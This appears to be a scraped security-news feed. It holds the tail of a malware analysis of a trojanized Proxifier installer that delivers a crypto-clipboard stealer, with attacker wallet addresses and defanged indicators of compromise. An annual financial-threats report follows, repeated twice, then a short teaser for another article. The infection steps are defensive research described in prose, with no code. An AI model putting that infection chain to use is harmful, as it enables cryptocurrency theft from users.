As soon as the required exclusions are set, the trojanized proxifier.exe extracts and launches the real Proxifier installer. Meanwhile, it quietly continues the infection in the background: it creates another donor process and injects a module named proxifierupdater.exe. This module acts as yet another injector. It launches the system utility conhost.exe and injects it with another .NET app, internally named “bin.exe”, which runs a PowerShell script using the same method as before.

The script is obfuscated and parts of it are encoded, but it really only performs four specific actions:

  • Add the “powershell” and “conhost” processes to Microsoft Defender exclusions.
  • Create a registry key at HKLM\SOFTWARE\System::Config and store another Base64-encoded PowerShell script inside it.
  • Set up a scheduled task to launch PowerShell with another script as an argument. The script’s task is to read the content of the created registry key, decode it, and transfer control to the resulting script.
  • Ping an IP Logger service at https[:]//maper[.]info/2X5tF5 to let the attackers know the infection was successful.

This wraps up the primary stage of the infection. As you can see, the Trojan attempts to use fileless (or bodiless) malware techniques. By executing malicious code directly in allocated memory, it leaves almost no footprint on the hard drive.

The next stage is launched along with the task created in the scheduler. This is what it looks like:

The task launches the PowerShell interpreter, passing the script from the arguments as input. As we already mentioned, it reads the contents of the previously created Config registry key, then decodes and executes it. This is yet another PowerShell script whose job is to download the next script from hardcoded addresses and execute it. These addresses belong to Pastebin-type services, and the content located there is encoded in several different ways at once.

Decoded and deobfuscated script from the Config registry key

Decoded and deobfuscated script from the Config registry key

The script from Pastebin continues the download chain. This time, the payload is located on GitHub.

Decoded script from Pastebin

Decoded script from Pastebin

It’s a massive script, clocking in at around 500 KB. Interestingly, the bulk of the file is just one long Base64 string. After decoding it and doing some deobfuscation, we end up with a script whose purpose is quite clear. It extracts shellcode from a Base64 string, launches the fontdrvhost.exe utility, injects the shellcode into it, and hands over control.

The shellcode, in turn, unpacks and sets up the code for the final payload. This is classic ClipBanker-like malware, and there’s nothing particularly fancy about it. It’s written in C++, compiled with MinGW, doesn’t bother with system persistence, and doesn’t even connect to the network. Its entire job is to constantly monitor the clipboard for strings that look like crypto wallet addresses belonging to various blockchain-based networks (Cardano, Algorand, Ethereum, Bitcoin, NEM, Stellar, BNB, Cosmos, Dash, Monero, Dogecoin, MultiversX, Arweave, Filecoin, Litecoin, Neo, Osmosis, Solana, THOR, Nano, Qtum, Waves, TRON, Ripple, Tezos, and ZelCash), and then swap them with the attackers’ own addresses.

Here is the full list of replacement addresses:

addr1qxenj0dwefgmp9z4t4dgek3yh3d8cfzcl6u97x2ln8c4nljjv7xdw2u0jhfdy90arm0xr0das4kznrh8qj33dzu8z5fqdtusyt
QSAROFQNKPXKKDNK67N5MQY5IQ4MTKGLI65KREVHKW53R2M6WHORP3ME2E
0x97c16182d2e91a9370d5590b670f6b8dc755680552e40218a2b28ec7ad105071
qrherxuw7fupud48l9xwvdcg7w64g8g7xvls9vgqyq
bc1q88r38gk8ynrhdfur7yefwf5hrn2y56s90vlrvq
36vf1gvZSxHkRRhAFiH6fotVWYEwH3tk22
14U9sBVDRyEfPgR8h9QJatwtrodey4NeH4
bc1phfm9d0fpqtgr9hkrxx5ww9k2qzww59q5czga95rtmk6vh5h8devsa72fxk
btg1qqfrsueknwmg92xrpch22wru0g4ka4p2vum3pdj
AcRjmRuDswUeQHtxJnzAn496r9Lo8XQjUK
GW9DJpw4mBJnVUWucX3szdH5bXZ9pqzLRF
bnb18nqx60dx6dhhsdyddcl0653392w0v4yhx07knl
cosmos10zqq0frph0rs36wwjg4r2r5626m6a2dgv3h6nv
DskZFNcs5MKg9EdvhAnu87YGzWwVoBvd2tZ
Xj3KofSCPq97odR8hiFjfeZs2FqbwUbstk
DJYXgJuBrc7cuGn4sgJXz1sdArKURkoWS9
erd14n38wkxm9epjh0s2y8078yqqzy4ztq9ckczy883dwcfgd54peaqs3tp2k2
a2dB176hgduQopnJPrEGjfojRWSHwTS62Q
f1qxoyqf3va2mwfbgzah3t7pqe7x5fmdev5dqc25a
inj1qw709q8utgjhxrs2cqczhmz2w254dedllzmlef
ltc1q4calyk5x5g36ckpsrcr6ndtxdlc0ea9qs4h44n
MCB8j9kXkX3f3BoXaBcsDc9RFoki9Kb3AR
LhMGEmEGwxcGhCEQ7QmbC1hywRbHbbv6p8
14FBxuV8HEuuWPFoFHbbG4Hm4pa7CqroQiGDeWvZdGiiJm8W
osmo10zqq0frph0rs36wwjg4r2r5626m6a2dgy2y297
7ATuKGME8AG9Tz5Qe4eRf1EAwqJNUvYXMiCGmtSbaJXR
thor12x0nqpjz2djpuaxm2j2z963sawdcze3nhxacyu
EQA28DFYnisowE0e49Sp2DUv6RKQWOJGbvegKWRPXE83bMnQ
nano_1j9mjyi4q8qytb1r7yyqntzkyay5xo1wznnwmy9a3p9r371zb3d6wr6xs8y5
QXwbqRnmxgmMZQk5WEvMYEBVzf1MP4eMY9
3P7zSKMhfMPr5kd85xtHNmCx2gi9apCgnSP
TNkGLYwtjcSk2A9U8cxJzttGeGEgz56hSP
GB4XWREV3WOXWIWFE3DVX3FUNUXLOC7EEGXHZXRUKI5AMZAG3SV7EV4P
46QtL5btfnq85iGrPDFabp4mxGhRbEZJaH67i5LhQsWhCnuiURKVU74QbMpf4TcZqgDnENMWaqhpt82vQSEdyBf4Tp1v8Y9
rKwSuwgNNWn8P8x1ckUopKkErnPW3tVrz9
tz1cPNzMxTsLzV1Gca2VowGgjRm7MkRzGLw5
t1Nwwai9UsQxcgJVVbssnmfjfznhbq2v8ud
ZEPHYR2tzMbbkY7CCsShtADqstJLEeZfEiDHQeRchSg8FoqAn2XzsDD8eEEx5cweBQb4jX12DhfPz36c6TD6uV9fPrcFMqwzTn93Y

The complete execution chain, from the moment the malicious installer starts until the ClipBanker code is running, looks like this:

Victims

Since the beginning of 2025, more than 2000 users of Kaspersky solutions have encountered this threat, most of them located in India and Vietnam. Interestingly, 70% of these detections came from the Kaspersky Virus Removal Tool, a free utility used to clean devices that are already infected. This underscores the importance of the preemptive protection: it is often cheaper and easier to prevent the infection than to face consequences of a successful attack.

Conclusion

This campaign is yet another perfect example of the old adage: “buy cheap, pay twice”. Trying to save a buck on software, combined with a lack of caution when hunting for free solutions, can lead to an infection and the subsequent theft of funds – in this case, cryptocurrency. The attackers are aggressively promoting their sites in search results and using fileless techniques alongside a marathon infection chain to stay under the radar. Such attacks are difficult to detect and stop in time.

To stay safe and avoid losing your money, use reliable security solutions that are able to prevent your device form being infected. Download software only from official sources. If for some reason you can’t use a reputable paid solution, we highly recommend thoroughly vetting the sites you use to download software.

Indicators of compromise

URLs
https[:]//pastebin[.]com/raw/FmpsDAtQ
https[:]//snippet[.]host/aaxniv/raw
https[:]//chiaselinks[.]com/raw/nkkywvmhux
https[:]//rlim[.]com/55Dfq32kaR/raw
https[:]//paste.kealper[.]com/raw/k3K5aPJQ
https[:]//git.parat[.]swiss/rogers7/dev-api/raw/master/cpzn
https[:]//pinhole[.]rootcode[.]ru/rogers7/dev-api/raw/master/cpzn
https[:]//github[.]com/lukecodix/Proxifier/releases/download/4.12/Proxifier.zip
https[:]//gist.github[.]com/msfcon5ol3/107484d66423cb601f418344cd648f12/raw/d85cef60cdb9e8d0f3cb3546de6ab657f9498ac7/upxz

Hashes
34a0f70ab100c47caaba7a5c85448e3d
7528bf597fd7764fcb7ec06512e073e0
8354223cd6198b05904337b5dff7772b

  •  

Financial cyberthreats in 2025 and the outlook for 2026

In 2025, the financial cyberthreat landscape continued to evolve. While traditional PC banking malware declined in relative prevalence, this shift was offset by the rapid growth of credential theft by infostealers. Attackers increasingly relied on aggregation and reuse of stolen data, rather than developing entirely new malware capabilities.

To describe the financial threat landscape in 2025, we analyzed anonymized data on malicious activities detected on the devices of Kaspersky security product users and consensually provided to us through the Kaspersky Security Network (KSN), along with publicly available data and data on the dark web.

We analyzed the data for

  • financial phishing,
  • banking malware,
  • infostealers and the dark web.

Key findings

Phishing

Phishing activity in 2025 shifted toward e-commerce (14.17%) and digital services (16.15%), with attackers increasingly tailoring campaigns to regional trends and user behavior, making social engineering more targeted despite reduced focus on traditional banking lures.

Banking malware

Financial PC malware declined in prevalence but remained a persistent threat, with established families continuing to operate, while attackers increasingly prioritize credential access and indirect fraud over deploying complex banking Trojans. To the contrary, mobile banking malware continues growing, as we wrote in detail in our mobile malware report.

Infostealers and the dark web

Infostealers became a central driver of financial cybercrime, fueling a growing dark web economy where stolen credentials, payment data, and full identity profiles are traded at scale, enabling widespread and destructive fraud operations.

Financial phishing

In 2025, online fraudsters continued to lure users to phishing and scam pages that mimicked the websites of popular brands and financial organizations. Attackers leveraged increasingly convincing social engineering techniques and brand impersonation to exploit user trust. Rather than relying solely on volume, campaigns showed greater targeting and contextual adaptation, reflecting a maturation of phishing operations.

The distribution of top phishing categories in 2025 shows a clear shift toward digital platforms that aggregate multiple user activities, with web services (16.15%), online games (14.58%), and online stores (14.17%) leading globally. Compared to 2024, the rise of online games and the decline of social networks and banks indicate that attackers are increasingly targeting environments where users are more likely to take a risk or engage impulsively. Categories such as instant messaging apps and global internet portals remain significant phishing targets, reflecting their role as communication and access hubs that can be exploited for credential harvesting.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices, 2025 (download)

Regional patterns further reinforce the adaptive nature of phishing campaigns, showing that attackers closely align category targeting with local digital habits. For example, online stores dominate heavily in the Middle East.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in the Middle East, 2025 (download)

Online games and instant messaging platforms feature more prominently in the CIS, suggesting a focus on younger or highly connected user bases.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in the CIS, 2025 (download)

APAC demonstrates almost equal shares of online games and banks which signifies a combined approach targeting different users.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in APAC, 2025 (download)

In Africa, a stronger emphasis on banks reflects the continued importance of traditional financial services. Most likely, this is due to the lower security level of the financial institutions in the region.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in Africa, 2025 (download)

Whereas in LATAM, delivery companies appearing in the top categories indicate attackers exploiting the growth of e-commerce logistics.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in Latin America, 2025 (download)

Europe presents a more balanced distribution across categories, pointing to diversified attack strategies.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in Europe, 2025 (download)

Attackers actively localize their tactics to maximize relevance and effectiveness.

The distribution of financial phishing pages by category in 2025 reveals strong regional asymmetries that reflect both user behavior and attacker prioritization.

Globally, online stores dominated (48.45%), followed by banks (26.05%) and payment systems (25.50%). The decline in bank phishing may suggest that these services are becoming increasingly difficult to successfully impersonate, so fraudsters are turning to easier ways to access users’ finances.

However, this balance shifts significantly at the regional level.

In the Middle East, phishing is overwhelmingly concentrated on e-commerce (85.8%), indicating a heavy reliance on online retail lures, whereas in Africa, bank-related phishing leads (53.75%), which may indicate that user account security there is still insufficient. LATAM shows a more balanced distribution but with a higher share of online store targeting (46.30%), while APAC and Europe display a more even spread across all three categories, pointing to diversified attack strategies. These variations suggest that attackers are not operating uniformly but are instead adapting campaigns to regional digital habits, payment ecosystems, and trust patterns – maximizing effectiveness by aligning phishing content with the most commonly used financial services in each market.

Distribution of financial phishing pages by category and region, 2025 (download)

Online shopping scams

The distribution of organizations mimicked by phishing and scam pages in 2025 highlights a clear shift toward globally recognized digital service and e-commerce brands, with attackers prioritizing platforms that have large, active user bases and frequent payment interactions.

Netflix (28.42%) solidified its ranking as the most impersonated brand, followed by Apple (20.55%), Spotify (18.09%), and Amazon (17.85%). This reflects a move away from traditional retail-only targets toward subscription-based and ecosystem-driven services.

TOP 10 online shopping brands mimicked by phishing and scam pages, 2025 (download)

Regionally, this trend varies: Netflix dominates heavily in the Middle East, Apple leads in APAC, while Spotify ranks first across Europe, LATAM, and Africa. Although most of the top platforms are highly popular across different regions, we may suggest that the attackers tailor brand impersonation to regional popularity and user engagement.

Payment system phishing

Phishing campaigns are impersonating multiple payment ecosystems to maximize coverage. While PayPal was the most mimicked in 2024 with 37.53%, its share dropped to 14.10% in 2025. Mastercard, on the contrary, attracted cybercriminals’ attention, its share increasing from 30.54% to 33.45%, while Visa accounted for a significant 20.06% (last year, it wasn’t in the TOP 5), reinforcing the growing focus on widely used banking card networks. The continued presence of American Express (3.87%) and the increasing number of pages mimicking PayPay (11.72%) further highlight attacker experimentation and regional adaptation.

TOP 5 payment systems mimicked by phishing and scam pages, 2025 (download)

Financial malware

In 2025, the decline in users affected by financial PC malware continued. On the one hand, people continue to rely on mobile devices to manage their finances. On the other hand, some of the most prominent malware families that were initially designed as bankers had not used this functionality for years, so we excluded them from these statistics.

Changes in the number of unique users attacked by banking malware, by month, 2023–2025 (download)

Windows systems remained the primary platform targeted by attackers with financial malware. According to Kaspersky Security Bulletin, overall detections included 1,338,357 banking Trojan attacks globally from November 2024 to October 2025, though this number is also declining due to increasing focus on mobile vectors. Desktop threats continued to be distributed via traditional delivery methods like malicious emails, compromised websites, and droppers.

In 2025, Brazilian-origin families such as Grandoreiro (part of the Tetrade group) stood out for their constant activity and global reach. Despite a major law enforcement disruption in early 2024, Grandoreiro remained active in 2025, re-emerging with updated variants and continuing to operate. Other notable actors included Coyote and emerging families like Maverick, which abused WhatsApp for distribution while maintaining fileless techniques and overlaps with established Brazilian banking malware to steal credentials and enable fraudulent transactions on desktop banking platforms. Besides traditional bankers, other Brazilian malware families are worth mentioning, which specifically target relatively new and highly popular regional payment systems. One of the most prominent threats among these is GoPix Trojan focusing on the users of Brazilian Pix payment system. It is also capable of targeting local Boleto payment method, as well as stealing cryptocurrency.

There was also a surge in incidents in 2025 in which fraudsters targeted organizations through electronic document management (EDM) systems, for example, by substituting invoice details to trick victims into transferring funds. The Pure Trojan was most frequently encountered in such attacks. Attackers typically distribute it through targeted emails, using abbreviations of document names, software titles, or other accounting-related keywords in the headers of attached files. Globally in the corporate segment, Pure was detected 896 633 times over 2025, with over 64 thousand users attacked.

Contrary to PC banking malware, mobile banker attacks grew by 1.5 times in 2025 compared to the previous reporting period, which is consistent with their growth in 2024. They also saw a sharp surge in the number of unique installation packages. More statistics and trends on mobile banking malware can be found in our yearly mobile threat report.

Complementing traditional financial malware, infostealers played a significant role in enabling financial crime both on PCs and mobile devices by harvesting credentials, cookies, and autofill data from browsers and applications, which attackers then used for account takeovers or direct banking fraud. Kaspersky analyses pointed to a surge in infostealer detections (up by 59% globally on PCs), fueling credential-based attacks.

Financial cyberthreats on the dark web

The Kaspersky Digital Footprint Intelligence (DFI) team closely monitors infostealer activity on both PC and mobile devices to analyze emerging trends and assess the evolving tactics of cybercriminals.

Fraudsters especially target financial data such as payment cards, cryptocurrency wallets, login credentials and cookies for banking services, as well as documents stored on the victim’s device. The stolen data is collected in log files and shared on dark web resources, where they are bought, sold, or distributed freely and then used for financial fraud.

With access to financial data, fraudsters can gain control of users’ bank accounts and payment cards, and withdraw funds. Compromised accounts and cards are also frequently used in subsequent activities, turning the victims into intermediaries in a fraud scheme.

Compromised accounts

Kaspersky DFI found that in 2025, over one million online banking accounts (these are not Kaspersky product users) served by the world’s 100 largest banks fell victim to infostealers: their credentials were being freely shared on the dark web.

The countries with the highest median number of compromised accounts per bank were India, Spain, and Brazil.

The chart below shows the median number of compromised accounts per bank for the TOP 10 countries.

TOP 10 countries with the highest compromised account median (download)

Compromised payment cards

Seventy-four percent of payment cards that were compromised by infostealer malware, published on dark web resources and identified by the Digital Footprint Intelligence team in 2025, remained valid as of March 2026. This means that attackers could still use the cards that had been stolen months or even years prior.

It should be noted that the number of bank accounts and payment cards known to have been compromised by infostealers in 2025 will continue to rise, because fraudsters do not publish the log files immediately after the compromise but only after a delay of months or even years.

Data breaches

Regardless of the industry in which the target company operates, data breaches often expose users’ financial data, including payment card information, bank account details, transaction histories and other financial information. As a consequence, the compromised databases are sold and distributed on underground resources.

It should be noted that the threat is not limited to the exposure of financial information alone. Various identity documents and even seemingly public data, such as names, phone numbers and email addresses, can become a risk when they are published on the dark web. Such data attracts fraudsters’ attention and can be used in social engineering attacks to gain access to the user’s financial assets.

An example of a post offering a database

An example of a post offering a database

Sale of bank accounts and payment cards

The dark web often features services provided by stores that specialize in selling bank accounts and payment cards. Fraudsters typically obtain data for sale from a variety of sources, including infostealer logs and leaked databases, which are first repackaged and then combined.

Examples of a post (top) and a site (bottom) offering payment cards

Examples of a post (top) and a site (bottom) offering payment cards

Often, sellers offer complete victim profiles, referred to by fraudsters as “fullz”. These include not only bank accounts or payment cards but also identification documents, dates of birth, residential addresses, and other personal details. A full‑information package is usually more expensive than a payment card or a bank account alone.

Examples of a post (top) and a site (bottom) offering bank accounts

Examples of a post (top) and a site (bottom) offering bank accounts

Compiled databases

Fraudsters exploit various sources, including previously leaked databases, to compile new, thematic ones. Finance- and, in particular, cryptocurrency-related databases, are among the most popular. Compilations aimed at specific user groups, such as the elderly or wealthy people, are also of interest to cybercriminals.

Usually, thematic databases contain personal information about users, such as names, phone numbers, and email addresses. Fraudsters can use this data to launch social engineering attacks.

An example of a message offering compiled databases

An example of a message offering compiled databases

Creation of phishing websites

Phishing websites have become a powerful tool for the financial enrichment of fraudsters. Cybercriminals create fraudulent sites that masquerade as legitimate resources of companies operating in various industries. Gambling and retail sites remain among the most popular targets.

In order to obtain personal and financial information from unsuspecting users, adversaries seek out ways to create such phishing websites. Ready-made layouts and website copies are sold on the dark web and advertised as profitable tools. Moreover, fraudsters offer phishing website creation services.

Examples of posts offering creation of phishing websites

Examples of posts offering creation of phishing websites

Conclusion

The decline of traditional PC banking malware is not an indicator of reduced risk; rather, it highlights a redistribution of attacker effort toward more efficient methods targeting mobile devices, credential theft, and social engineering. Infostealers, in particular, are a force multiplier, enabling widespread compromise at scale.

Looking ahead to 2026, the financial threat landscape is expected to become even more data-driven and automated. Organizations must adapt by focusing on identity protection, real-time monitoring, and cross-channel threat intelligence, while users must remain vigilant against increasingly sophisticated and personalized attack techniques.

  •  

Financial cyberthreats in 2025 and the outlook for 2026

In 2025, the financial cyberthreat landscape continued to evolve. While traditional PC banking malware declined in relative prevalence, this shift was offset by the rapid growth of credential theft by infostealers. Attackers increasingly relied on aggregation and reuse of stolen data, rather than developing entirely new malware capabilities.

To describe the financial threat landscape in 2025, we analyzed anonymized data on malicious activities detected on the devices of Kaspersky security product users and consensually provided to us through the Kaspersky Security Network (KSN), along with publicly available data and data on the dark web.

We analyzed the data for

  • financial phishing,
  • banking malware,
  • infostealers and the dark web.

Key findings

Phishing

Phishing activity in 2025 shifted toward e-commerce (14.17%) and digital services (16.15%), with attackers increasingly tailoring campaigns to regional trends and user behavior, making social engineering more targeted despite reduced focus on traditional banking lures.

Banking malware

Financial PC malware declined in prevalence but remained a persistent threat, with established families continuing to operate, while attackers increasingly prioritize credential access and indirect fraud over deploying complex banking Trojans. To the contrary, mobile banking malware continues growing, as we wrote in detail in our mobile malware report.

Infostealers and the dark web

Infostealers became a central driver of financial cybercrime, fueling a growing dark web economy where stolen credentials, payment data, and full identity profiles are traded at scale, enabling widespread and destructive fraud operations.

Financial phishing

In 2025, online fraudsters continued to lure users to phishing and scam pages that mimicked the websites of popular brands and financial organizations. Attackers leveraged increasingly convincing social engineering techniques and brand impersonation to exploit user trust. Rather than relying solely on volume, campaigns showed greater targeting and contextual adaptation, reflecting a maturation of phishing operations.

The distribution of top phishing categories in 2025 shows a clear shift toward digital platforms that aggregate multiple user activities, with web services (16.15%), online games (14.58%), and online stores (14.17%) leading globally. Compared to 2024, the rise of online games and the decline of social networks and banks indicate that attackers are increasingly targeting environments where users are more likely to take a risk or engage impulsively. Categories such as instant messaging apps and global internet portals remain significant phishing targets, reflecting their role as communication and access hubs that can be exploited for credential harvesting.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices, 2025 (download)

Regional patterns further reinforce the adaptive nature of phishing campaigns, showing that attackers closely align category targeting with local digital habits. For example, online stores dominate heavily in the Middle East.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in the Middle East, 2025 (download)

Online games and instant messaging platforms feature more prominently in the CIS, suggesting a focus on younger or highly connected user bases.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in the CIS, 2025 (download)

APAC demonstrates almost equal shares of online games and banks which signifies a combined approach targeting different users.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in APAC, 2025 (download)

In Africa, a stronger emphasis on banks reflects the continued importance of traditional financial services. Most likely, this is due to the lower security level of the financial institutions in the region.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in Africa, 2025 (download)

Whereas in LATAM, delivery companies appearing in the top categories indicate attackers exploiting the growth of e-commerce logistics.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in Latin America, 2025 (download)

Europe presents a more balanced distribution across categories, pointing to diversified attack strategies.

TOP 10 categories of organizations mimicked by phishing and scam pages that were blocked on home users’ devices in Europe, 2025 (download)

Attackers actively localize their tactics to maximize relevance and effectiveness.

The distribution of financial phishing pages by category in 2025 reveals strong regional asymmetries that reflect both user behavior and attacker prioritization.

Globally, online stores dominated (48.45%), followed by banks (26.05%) and payment systems (25.50%). The decline in bank phishing may suggest that these services are becoming increasingly difficult to successfully impersonate, so fraudsters are turning to easier ways to access users’ finances.

However, this balance shifts significantly at the regional level.

In the Middle East, phishing is overwhelmingly concentrated on e-commerce (85.8%), indicating a heavy reliance on online retail lures, whereas in Africa, bank-related phishing leads (53.75%), which may indicate that user account security there is still insufficient. LATAM shows a more balanced distribution but with a higher share of online store targeting (46.30%), while APAC and Europe display a more even spread across all three categories, pointing to diversified attack strategies. These variations suggest that attackers are not operating uniformly but are instead adapting campaigns to regional digital habits, payment ecosystems, and trust patterns – maximizing effectiveness by aligning phishing content with the most commonly used financial services in each market.

Distribution of financial phishing pages by category and region, 2025 (download)

Online shopping scams

The distribution of organizations mimicked by phishing and scam pages in 2025 highlights a clear shift toward globally recognized digital service and e-commerce brands, with attackers prioritizing platforms that have large, active user bases and frequent payment interactions.

Netflix (28.42%) solidified its ranking as the most impersonated brand, followed by Apple (20.55%), Spotify (18.09%), and Amazon (17.85%). This reflects a move away from traditional retail-only targets toward subscription-based and ecosystem-driven services.

TOP 10 online shopping brands mimicked by phishing and scam pages, 2025 (download)

Regionally, this trend varies: Netflix dominates heavily in the Middle East, Apple leads in APAC, while Spotify ranks first across Europe, LATAM, and Africa. Although most of the top platforms are highly popular across different regions, we may suggest that the attackers tailor brand impersonation to regional popularity and user engagement.

Payment system phishing

Phishing campaigns are impersonating multiple payment ecosystems to maximize coverage. While PayPal was the most mimicked in 2024 with 37.53%, its share dropped to 14.10% in 2025. Mastercard, on the contrary, attracted cybercriminals’ attention, its share increasing from 30.54% to 33.45%, while Visa accounted for a significant 20.06% (last year, it wasn’t in the TOP 5), reinforcing the growing focus on widely used banking card networks. The continued presence of American Express (3.87%) and the increasing number of pages mimicking PayPay (11.72%) further highlight attacker experimentation and regional adaptation.

TOP 5 payment systems mimicked by phishing and scam pages, 2025 (download)

Financial malware

In 2025, the decline in users affected by financial PC malware continued. On the one hand, people continue to rely on mobile devices to manage their finances. On the other hand, some of the most prominent malware families that were initially designed as bankers had not used this functionality for years, so we excluded them from these statistics.

Changes in the number of unique users attacked by banking malware, by month, 2023–2025 (download)

Windows systems remained the primary platform targeted by attackers with financial malware. According to Kaspersky Security Bulletin, overall detections included 1,338,357 banking Trojan attacks globally from November 2024 to October 2025, though this number is also declining due to increasing focus on mobile vectors. Desktop threats continued to be distributed via traditional delivery methods like malicious emails, compromised websites, and droppers.

In 2025, Brazilian-origin families such as Grandoreiro (part of the Tetrade group) stood out for their constant activity and global reach. Despite a major law enforcement disruption in early 2024, Grandoreiro remained active in 2025, re-emerging with updated variants and continuing to operate. Other notable actors included Coyote and emerging families like Maverick, which abused WhatsApp for distribution while maintaining fileless techniques and overlaps with established Brazilian banking malware to steal credentials and enable fraudulent transactions on desktop banking platforms. Besides traditional bankers, other Brazilian malware families are worth mentioning, which specifically target relatively new and highly popular regional payment systems. One of the most prominent threats among these is GoPix Trojan focusing on the users of Brazilian Pix payment system. It is also capable of targeting local Boleto payment method, as well as stealing cryptocurrency.

There was also a surge in incidents in 2025 in which fraudsters targeted organizations through electronic document management (EDM) systems, for example, by substituting invoice details to trick victims into transferring funds. The Pure Trojan was most frequently encountered in such attacks. Attackers typically distribute it through targeted emails, using abbreviations of document names, software titles, or other accounting-related keywords in the headers of attached files. Globally in the corporate segment, Pure was detected 896 633 times over 2025, with over 64 thousand users attacked.

Contrary to PC banking malware, mobile banker attacks grew by 1.5 times in 2025 compared to the previous reporting period, which is consistent with their growth in 2024. They also saw a sharp surge in the number of unique installation packages. More statistics and trends on mobile banking malware can be found in our yearly mobile threat report.

Complementing traditional financial malware, infostealers played a significant role in enabling financial crime both on PCs and mobile devices by harvesting credentials, cookies, and autofill data from browsers and applications, which attackers then used for account takeovers or direct banking fraud. Kaspersky analyses pointed to a surge in infostealer detections (up by 59% globally on PCs), fueling credential-based attacks.

Financial cyberthreats on the dark web

The Kaspersky Digital Footprint Intelligence (DFI) team closely monitors infostealer activity on both PC and mobile devices to analyze emerging trends and assess the evolving tactics of cybercriminals.

Fraudsters especially target financial data such as payment cards, cryptocurrency wallets, login credentials and cookies for banking services, as well as documents stored on the victim’s device. The stolen data is collected in log files and shared on dark web resources, where they are bought, sold, or distributed freely and then used for financial fraud.

With access to financial data, fraudsters can gain control of users’ bank accounts and payment cards, and withdraw funds. Compromised accounts and cards are also frequently used in subsequent activities, turning the victims into intermediaries in a fraud scheme.

Compromised accounts

Kaspersky DFI found that in 2025, over one million online banking accounts (these are not Kaspersky product users) served by the world’s 100 largest banks fell victim to infostealers: their credentials were being freely shared on the dark web.

The countries with the highest median number of compromised accounts per bank were India, Spain, and Brazil.

The chart below shows the median number of compromised accounts per bank for the TOP 10 countries.

TOP 10 countries with the highest compromised account median (download)

Compromised payment cards

Seventy-four percent of payment cards that were compromised by infostealer malware, published on dark web resources and identified by the Digital Footprint Intelligence team in 2025, remained valid as of March 2026. This means that attackers could still use the cards that had been stolen months or even years prior.

It should be noted that the number of bank accounts and payment cards known to have been compromised by infostealers in 2025 will continue to rise, because fraudsters do not publish the log files immediately after the compromise but only after a delay of months or even years.

Data breaches

Regardless of the industry in which the target company operates, data breaches often expose users’ financial data, including payment card information, bank account details, transaction histories and other financial information. As a consequence, the compromised databases are sold and distributed on underground resources.

It should be noted that the threat is not limited to the exposure of financial information alone. Various identity documents and even seemingly public data, such as names, phone numbers and email addresses, can become a risk when they are published on the dark web. Such data attracts fraudsters’ attention and can be used in social engineering attacks to gain access to the user’s financial assets.

An example of a post offering a database

An example of a post offering a database

Sale of bank accounts and payment cards

The dark web often features services provided by stores that specialize in selling bank accounts and payment cards. Fraudsters typically obtain data for sale from a variety of sources, including infostealer logs and leaked databases, which are first repackaged and then combined.

Examples of a post (top) and a site (bottom) offering payment cards

Examples of a post (top) and a site (bottom) offering payment cards

Often, sellers offer complete victim profiles, referred to by fraudsters as “fullz”. These include not only bank accounts or payment cards but also identification documents, dates of birth, residential addresses, and other personal details. A full‑information package is usually more expensive than a payment card or a bank account alone.

Examples of a post (top) and a site (bottom) offering bank accounts

Examples of a post (top) and a site (bottom) offering bank accounts

Compiled databases

Fraudsters exploit various sources, including previously leaked databases, to compile new, thematic ones. Finance- and, in particular, cryptocurrency-related databases, are among the most popular. Compilations aimed at specific user groups, such as the elderly or wealthy people, are also of interest to cybercriminals.

Usually, thematic databases contain personal information about users, such as names, phone numbers, and email addresses. Fraudsters can use this data to launch social engineering attacks.

An example of a message offering compiled databases

An example of a message offering compiled databases

Creation of phishing websites

Phishing websites have become a powerful tool for the financial enrichment of fraudsters. Cybercriminals create fraudulent sites that masquerade as legitimate resources of companies operating in various industries. Gambling and retail sites remain among the most popular targets.

In order to obtain personal and financial information from unsuspecting users, adversaries seek out ways to create such phishing websites. Ready-made layouts and website copies are sold on the dark web and advertised as profitable tools. Moreover, fraudsters offer phishing website creation services.

Examples of posts offering creation of phishing websites

Examples of posts offering creation of phishing websites

Conclusion

The decline of traditional PC banking malware is not an indicator of reduced risk; rather, it highlights a redistribution of attacker effort toward more efficient methods targeting mobile devices, credential theft, and social engineering. Infostealers, in particular, are a force multiplier, enabling widespread compromise at scale.

Looking ahead to 2026, the financial threat landscape is expected to become even more data-driven and automated. Organizations must adapt by focusing on identity protection, real-time monitoring, and cross-channel threat intelligence, while users must remain vigilant against increasingly sophisticated and personalized attack techniques.

  •  

Understanding Current Threats to Kubernetes Environments

Unit 42 uncovers escalating Kubernetes attacks, detailing how threat actors exploit identities and critical vulnerabilities to compromise cloud environments.

The post Understanding Current Threats to Kubernetes Environments appeared first on Unit 42.

  •  
❌